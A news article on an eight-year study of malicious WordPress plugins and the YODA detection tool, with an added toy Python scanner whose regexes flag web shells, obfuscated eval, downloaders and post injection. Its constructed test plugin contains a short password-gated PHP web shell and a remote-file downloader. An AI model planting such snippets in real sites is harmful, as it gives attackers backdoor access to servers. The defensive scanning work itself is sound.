A total of 47,337 malicious plugins were discovered on 24,931 different websites, with 3,685 of them being sold on legitimate markets, netting the attackers $41,500 in unlawful profits.
The findings come from an 8-year study by a group of academics at the Georgia Institute of Technology, who built a new tool called YODA to detect rogue WordPress plugins and trace their origin.
In a recent article titled “Mistrust Plugins You Must,” the researchers revealed that attackers impersonated benign plugin providers and spread malware by distributing pirated plugins.
“Malicious activity peaked in March 2020, with the number of malicious plugins on websites continuously increasing over time. Surprisingly, 94 percent of the malicious plugins that were installed during that time period are still active today,” she says.
The large-scale study looked at WordPress plugins installed on 410,122 different web servers dating back to 2012, and discovered that plugins costing a total of $834,000 were infected by threat actors after they were deployed.
YODA can be directly incorporated into a website and hosted by a web server hosting provider, or it can be distributed through a plugin marketplace. The framework may be used to identify a plugin’s provenance and ownership in addition to detecting hidden and malware-rigged add-ons.
It does this by first identifying plugins through analysis of server-side code files and their accompanying metadata (e.g., comments), then running a syntactic and semantic analysis to flag dangerous behaviour.
Web shells, functions that insert new posts, password-protected execution of injected code, spam injection, code obfuscation, black-hat SEO, malware downloaders, malvertising, and cryptocurrency miners are all covered by the semantic model.
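To make the two-stage approach concrete, here is an added toy scanner written for this article; it is not YODA's code and does not reproduce its models. It reads a plugin's files, parses the standard WordPress header comment for provenance metadata, and maps a handful of simplified syntactic indicators (assumed regexes) onto the semantic categories named above. Both sample plugins, the header values and the placeholder hash are constructed for the demo.

```python
"""Toy WordPress plugin scanner (added example, not YODA's code).

Stage 1: read plugin files and the header comment that carries provenance
metadata. Stage 2: run syntactic checks and map hits to semantic categories.
Regexes and sample plugins are simplified, constructed assumptions.
"""
import re

# Standard WordPress header fields, found in the first comment block of the main file.
HEADER_FIELDS = ("Plugin Name", "Plugin URI", "Author", "Author URI", "Version")

# (semantic category, syntactic indicator). Deliberately coarse; real tooling
# would work on a parsed AST rather than regexes.
INDICATORS = [
    ("obfuscation", r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    ("web_shell", r"\b(system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST)\b"),
    ("password_gated_execution",
     r"md5\s*\(\s*\$_(GET|POST|REQUEST)\[[^\]]+\]\s*\)\s*===?\s*['\"][0-9a-f]{32}['\"]"),
    ("malware_downloader", r"file_put_contents\s*\([^;]*\$_(GET|POST|REQUEST)\b"),
    ("post_injection", r"\bwp_insert_post\s*\([^;]*\$_(GET|POST|REQUEST)\b"),
]


def parse_plugin_header(source: str) -> dict:
    """Extract WordPress header fields from the leading /* ... */ comment."""
    match = re.search(r"/\*(.*?)\*/", source, re.S)
    header = {}
    if not match:
        return header
    for line in match.group(1).splitlines():
        key, sep, value = line.strip(" *\t").partition(":")
        if sep and key.strip() in HEADER_FIELDS:
            header[key.strip()] = value.strip()
    return header


def scan_source(source: str) -> set:
    """Return the semantic categories whose indicators appear in one file."""
    return {cat for cat, pattern in INDICATORS if re.search(pattern, source, re.I)}


def assess_plugin(files: dict) -> dict:
    """files maps path -> contents; the first entry is the main plugin file."""
    main_file = next(iter(files))
    header = parse_plugin_header(files[main_file])
    categories = set()
    for body in files.values():
        categories |= scan_source(body)
    # Missing provenance fields are flagged but are not evidence of malice by themselves.
    provenance_ok = all(f in header for f in ("Plugin Name", "Author", "Version"))
    return {
        "header": header,
        "categories": sorted(categories),
        "provenance_ok": provenance_ok,
        "malicious": bool(categories),
    }


# Constructed sample: a harmless footer plugin with complete metadata.
BENIGN_PLUGIN = {
    "hello-footer/hello-footer.php": """<?php
/*
Plugin Name: Hello Footer
Plugin URI: https://example.invalid/hello-footer
Author: Example Dev
Version: 1.0.2
*/
add_action('wp_footer', function () { echo '<p>Thanks for visiting.</p>'; });
""",
}

# Constructed sample: legitimate-looking header, malicious behaviour in the body.
SUSPECT_PLUGIN = {
    "seo-boost/seo-boost.php": """<?php
/*
Plugin Name: SEO Boost Pro
Author: Example Dev
Version: 3.1
*/
eval(base64_decode($cfg));
""",
    "seo-boost/inc/helper.php": """<?php
if (md5($_POST['k']) == '0123456789abcdef0123456789abcdef') { system($_POST['c']); }
file_put_contents(__DIR__ . '/cache.php', file_get_contents($_GET['u']));
""",
}

if __name__ == "__main__":
    for name, plugin in (("benign", BENIGN_PLUGIN), ("suspect", SUSPECT_PLUGIN)):
        print(name, assess_plugin(plugin))
```

The second sample makes the article's point about impersonation: its header passes the provenance check, so metadata alone would not catch it; the verdict comes from the semantic categories the body triggers.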
The following are some more important findings:
- Spam injection was made possible via 3,452 plugins accessible on authorized plugin markets.
- Post-deployment, 40,533 plugins were infected across 18,034 websites.
- Nulled plugins, which are WordPress plugins or themes that have been altered to download harmful code onto servers, accounted for 8,525 of the total malicious add-ons, with around 75% of the pirated plugins defrauding creators of $228,000 in income.
“By using YODA, website owners and hosting providers may detect dangerous plugins on the web server,” the researchers explained. “Plugin developers and marketplaces can vet their plugins before distribution.”